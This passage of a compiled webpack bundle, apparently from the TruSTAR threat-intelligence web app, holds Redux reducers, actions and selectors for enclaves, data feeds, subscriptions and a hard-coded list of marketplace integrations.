    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* UPDATE_PREFERENCES_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["fromJS"])(__WEBPACK_IMPORTED_MODULE_4__types_js__["e" /* toProfile */], payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_FAILURE */]:
      return Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["d" /* Profile */])();
    default:
      return state;
  }
};

var quotas = function quotas() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_QUOTAS_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH_QUOTAS_FAILURE */]:
      return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* UPDATE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* FETCH_QUOTAS */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_QUOTAS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH_QUOTAS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* UPDATE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* UPDATE_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var seenUpsellModal = function seenUpsellModal() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* HIDE_UPSELL_MODAL */]:
      return true;
    default:
      return state;
  }
};

var serialize = function serialize(state) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["pickImmutable"])(['seenUpsellModal'], state);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  quotas: quotas,
  profile: profile,
  loading: loading,
  seenUpsellModal: seenUpsellModal
}));

/***/ }),
/* 1306 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "feedsMap", function() { return feedsMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "feed", function() { return feed; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getCredentialObject", function() { return getCredentialObject; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types__ = __webpack_require__(712);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_miscellaneous_getters_js__ = __webpack_require__(345);







// getters from key path
var feedsMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['dataFeeds', 'feeds']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['dataFeeds', 'loading']);

/* Grab specific feed based on given guid */
var feed = function feed(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(feedsMap, function (feeds) {
    return feeds.get(guid);
  });
};

/* Generate initial form values for save/edit enclave subscription modal */
var getCredentialObject = function getCredentialObject(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([feed(id), __WEBPACK_IMPORTED_MODULE_4_modules_miscellaneous_getters_js__["credentialsTypes"]], function (feed, credentialsTypes) {
    return credentialsTypes.get(feed.get('credentialsType'));
  });
};

/***/ }),
/* 1307 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FEEDS_ENDPOINT", function() { return FEEDS_ENDPOINT; });
var FEEDS_ENDPOINT = '/services/feeds';

/***/ }),
/* 1308 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveEnclave", function() { return saveEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteEnclave", function() { return deleteEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(356);





var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:enclave:actions'); // eslint-disable-line no-unused-vars




/**
 * Fetch all enclaves that the user has access to. This means that TruSTAR admin
 * users will receive all enclaves, and everyone else will have access to only
 * the enclaves they has access to as a user.
 */
var fetch = function fetch() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH */],
    payload: payload
  };
};

/**
 * Save an enclave
 */
var saveEnclave = function saveEnclave(enclave) {
  var marketplaceImageFile = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
  var sourceSVGFile = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : null;
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* SAVE */],
    payload: enclave,
    meta: {
      file: marketplaceImageFile,
      sourceSVGFile: sourceSVGFile
    }
  };
};

/**
 * Delete enclave by id
 */
var deleteEnclave = function deleteEnclave(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE */],
    payload: id
  };
};

/**
 * Set display options. Determines sorting and filtering of Enclaves displayed to admins.
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 1309 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export enclaves */
/* unused harmony export options */
/* unused harmony export colors */
/* unused harmony export loading */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return serialize; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__ = __webpack_require__(705);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(356);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__ = __webpack_require__(177);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_enclave_management_action_types_js__ = __webpack_require__(497);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types_js__ = __webpack_require__(99);
















var enclaves = function enclaves() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_7_modules_enclave_management_action_types_js__["l" /* SAVE_SUCCESS */]:
      return state.set(payload.id, payload);
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */]:
      return state.setIn([payload.guid, 'iconUrl'], payload.iconUrl);
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload);
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_8__types_js__["d" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

/**
 * NOTE: Pre-existing state always takes precedence over new color state. This
 * is because we persist colors specifically for consistency so we favor the
 * existing values over new values.
 */
var colors = function colors() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {

    // NOTE: The reason we do this manually is that the rehydrate action
    // overwrites state. They recommend buffering actions so as to ensure the
    // rehydration happens first, but this is tough since som of our epics are
    // stateful
    case __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__["REHYDRATE"]:
      // NOTE: Yeah, payload is a very odd plain object of app state keys mapped
      // to the serialized app state... so we have a plain object with immutable
      // objects at each key
      try {
        return state.merge(payload.enclaves.get('colors'));
      } catch (err) {
        return state;
      }

    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
      return payload.map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('color')).merge(state);
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* SAVE_SUCCESS */]:
      return state.update(payload.id, function (c) {
        return c || payload.color;
      });
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* DELETE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["h" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* DELETE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["b" /* SAVE_ENCLAVE_ICON_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var serialize = function serialize(state) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["pickImmutable"])(['colors'], state);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  enclaves: enclaves,
  loading: loading,
  options: options,
  colors: colors
}));

/***/ }),
/* 1310 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__epics_js__ = __webpack_require__(2921);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_0__epics_js__["a"]; });


/***/ }),
/* 1311 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchLabels", function() { return fetchLabels; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAccessTypes", function() { return fetchAccessTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchSubscriptionMethods", function() { return fetchSubscriptionMethods; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchCredentialsTypes", function() { return fetchCredentialsTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchEntityTypes", function() { return fetchEntityTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleEntityType", function() { return toggleEntityType; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types__ = __webpack_require__(715);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__types_js__ = __webpack_require__(1312);




var fetchLabels = function fetchLabels() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["j" /* FETCH_LABELS */]
  };
};

var fetchAccessTypes = function fetchAccessTypes() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["a" /* FETCH_ACCESS_TYPES */]
  };
};

var fetchSubscriptionMethods = function fetchSubscriptionMethods() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["m" /* FETCH_SUBSCRIPTION_METHODS */]
  };
};

var fetchCredentialsTypes = function fetchCredentialsTypes() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["d" /* FETCH_CREDENTIALS_TYPES */]
  };
};

var fetchEntityTypes = function fetchEntityTypes() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["g" /* FETCH_ENTITY_TYPES */]
  };
};

var toggleEntityType = function toggleEntityType(entityType) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["p" /* TOGGLE_ENTITY_TYPE */],
    payload: entityType
  };
};

/***/ }),
/* 1312 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return EntityType; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var EntityType = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: null,
  name: null,
  custom: null,
  default: null
});

/***/ }),
/* 1313 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allFeedsMap", function() { return allFeedsMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allSubsMap", function() { return allSubsMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allInts", function() { return allInts; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "feedToStandard", function() { return feedToStandard; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "subscriptionToStandard", function() { return subscriptionToStandard; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "integrationToStandard", function() { return integrationToStandard; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allFeeds", function() { return allFeeds; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allSubs", function() { return allSubs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allFeedsAndSubs", function() { return allFeedsAndSubs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fixedIntegrationsList", function() { return fixedIntegrationsList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "premiumIntegrations", function() { return premiumIntegrations; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "openPremiumIntelSources", function() { return openPremiumIntelSources; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allIntegrations", function() { return allIntegrations; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types_js__ = __webpack_require__(895);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_data_feeds__ = __webpack_require__(298);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_subscriptions__ = __webpack_require__(407);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_data_feeds_getters_js__ = __webpack_require__(1306);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };









var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['marketplace', 'options']);
var allFeedsMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['dataFeeds', 'feeds']);
var allSubsMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['subscriptions', 'subscriptions']);
var allInts = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['marketplace', 'fixedIntegrationsList']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['marketplace', 'loading']);

/** Utility function for converting a DataFeed to StandardMarketplace Record  */
var feedToStandard = function feedToStandard(feed) {
  if (feed) {
    return Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["d" /* StandardMarketplace */])({
      feedGuid: feed.guid,
      name: feed.name,
      iconUrl: feed.iconUrl,
      description: feed.description,
      credentialsType: feed.credentialsType,
      externalUrl: feed.externalUrl,
      label: feed.label,
      created: feed.created,
      updated: feed.updated
    });
  }
};

/** Utility function for converting a Subscription to StandardMarketplace Record  */
var subscriptionToStandard = function subscriptionToStandard(subscription, feed) {
  if (subscription) {
    return Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["d" /* StandardMarketplace */])({
      name: feed.get('name'),
      feedGuid: subscription.get('feedGuid'),
      enclaveGuid: subscription.get('enclaveGuid'),
      companyGuid: subscription.get('companyGuid'),
      state: subscription.get('state'),
      lastPulled: subscription.get('lastPulled'),
      subscriptionDate: subscription.get('created')
    });
  }
};

/** Utility function for converting an Integration to StandardMarketplace Record  */
var integrationToStandard = function integrationToStandard(integration) {
  if (integration) {
    return Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["d" /* StandardMarketplace */])({
      name: integration.name,
      iconUrl: integration.iconUrl,
      description: integration.description,
      externalUrl: integration.externalUrl,
      label: integration.label
    });
  }
};

/** Grabs all feeds and collects them into a List of StandardMarketplace Records */
var allFeeds = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([allFeedsMap, displayOptions], function (feeds, options) {
  var result = feeds;
  if (feeds && !feeds.isEmpty()) {
    result = feeds.map(function (feed) {
      return feedToStandard(feed);
    });
    return result.toList();
  }
});

/** Grabs all subscriptions and collects them into a list of StandardMarketplace Records */
var allSubs = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([allSubsMap, __WEBPACK_IMPORTED_MODULE_6_modules_data_feeds_getters_js__["feedsMap"], displayOptions], function (subs, feedsMap, options) {
  var result = subs;
  if (subs && !subs.isEmpty()) {
    result = subs.map(function (sub) {
      return subscriptionToStandard(sub, feedsMap.get(sub.get('feedGuid')));
    });
    return result.toList();
  }
});

/** Aggregates all DataFeeds and Subscriptions into an OrderedMap of StandardMarketplace Records  */
var allFeedsAndSubs = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([allFeedsMap, allSubsMap], function (feeds, subs) {
  var result = void 0;
  if (feeds) {
    // go thru the feeds and see if by the feedGuid, there is a corresponding subscription with that feedGuid
    result = feeds.map(function (feed) {
      var sub = subs.get(feed.get('guid'));
      // if there is a corresponding subscription: grab its relevant properties, and use them along with
      // the feed properties to create the StandardMarketplace Record
      return Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["d" /* StandardMarketplace */])({
        feedGuid: feed.guid,
        name: feed.name,
        iconUrl: feed.iconUrl,
        description: feed.description,
        credentialsType: feed.credentialsType,
        maximumAccess: feed.maximumAccess,
        externalUrl: feed.externalUrl,
        label: feed.label,
        enclaveGuid: sub ? sub.get('enclaveGuid') : null,
        companyGuid: sub ? sub.get('companyGuid') : null,
        state: sub ? sub.get('state') : null,
        lastPulled: sub ? sub.get('lastPulled') : null,
        subscriptionDate: sub ? sub.get('created') : null,
        created: feed.created,
        updated: feed.updated
      });
    });
  }
  return result;
});

var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(list);
};

/** Fixed list of all the available integrations on the platform (as of Oct. 2019) - This should
 * be a dynamic list managed by trustar power users. */
var fixedIntegrationsList = [{
  name: 'Splunk SOAR',
  description: 'Orchestrate security workflows and automate tasks in seconds to empower your SOC, work smarter and respond faster.',
  iconUrl: 'https://s3.amazonaws.com/trustar-production-staticcontent/images/splunk-soar-logo.png',
  externalUrl: 'https://www.splunk.com/en_us/products/splunk-security-orchestration-and-automation.html'
}, {
  name: 'Splunk ES',
  description: 'The Splunk ES workflow app facilitates the detection, investigation, and response of notable events and alerts.',
  iconUrl: 'https://trustar-staging-staticcontent.s3.amazonaws.com/logos/60bc78da-9f6a-4ca8-ae9c-b9d95210b645.png',
  externalUrl: 'https://support.trustar.co/category/cnz0mrvzh1-splunk-unified'
}, {
  name: 'ServiceNow',
  description: 'This plugin allows users to utilize context of TruSTAR’s IOCs and incidents within ServiceNow workflow.',
  iconUrl: 'https://s3.amazonaws.com/trustar-production-staticcontent/images/servicenow-logo.png',
  externalUrl: 'https://support.trustar.co/article/5qzlkkzw7g-install-tru-star-for-service-now-v-2'
}, {
  name: 'Chrome Extension',
  description: 'This App allows users to highlight text from their Chrome browser and see what kind of context is available from the TruSTAR platform. If there is additional context available on TruSTAR a deep link is shown on the extension window that takes you to the TruSTAR Station.',
  iconUrl: 'https://s3.amazonaws.com/trustar-production-staticcontent/images/chrome-logo.png',
  externalUrl: 'https://support.trustar.co/article/r0J3AaBiHG-chrome-extension'
}].map(function (x) {
  return _extends({}, x, {
    label: 'INTEGRATION'
  });
});

// For integrations AKA applications that are premium content
var premiumIntegrations = listToOrderedMap([{
  name: 'AWS GuardDuty',
  description: 'TruSTARs AWS GuardDuty Integration allows AWS users who have access to GuardDuty send GD”Findings” into their private enclaves in TruSTAR. The way the integration works is by having users send their Guard Duty Findings as events into TruSTAR. Users can create a Lambda function by importing TruSTAR’s custom script that sends findings as events in TruSTAR.',
  iconUrl: 'https://trustar-staging-staticcontent.s3.amazonaws.com/logos/3148948f-a37a-409b-a25f-eae807c3d7da.png',
  externalUrl: 'https://support.trustar.co/article/41mmladxan-guard-duty'
}].map(function (x) {
  return _extends({}, x, {
    label: 'INTEGRATION',
    isPremiumContent: true // This may become our new way of determining paid content instead of closed source
  });
}));

/*
  These are premium intel sources which require API credentials to activate but ARE available to NON-PAYING companies
CISCP yes
A-ISAC
F-ISAC
FS-ISAC
H-ISAC TLP Amber Alerts
 */
var openPremiumIntelSources = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])({
  CISCP: true,
  'A-ISAC': true,
  'F-ISAC': true,
  'FS-ISAC': true,
  'H-ISAC TLP Amber Alerts': true,
  'Taxii Client A': true,
  'Taxii Client B': true,
  'Taxii Client C': true
});

var allIntegrations = listToOrderedMap(fixedIntegrationsList);

/***/ }),
/* 1314 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setViewOptions", function() { return setViewOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(358);


/* Toggle enclave selection menu open and closed */
var setViewOptions = function setViewOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["p" /* SET_VIEW_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 1315 */,
/* 1316 */,
/* 1317 */,
/* 1318 */,
/* 1319 */,
/* 1320 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return generateDefaultRange; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__actions_js__ = __webpack_require__(1314);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__action_types_js__ = __webpack_require__(358);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_metrics_action_types_js__ = __webpack_require__(505);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_enclave_action_types_js__ = __webpack_require__(356);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_insights_getters_js__ = __webpack_require__(359);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__getters_js__ = __webpack_require__(359);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions_js__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_trustar_utils_dashboard__ = __webpack_require__(500);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

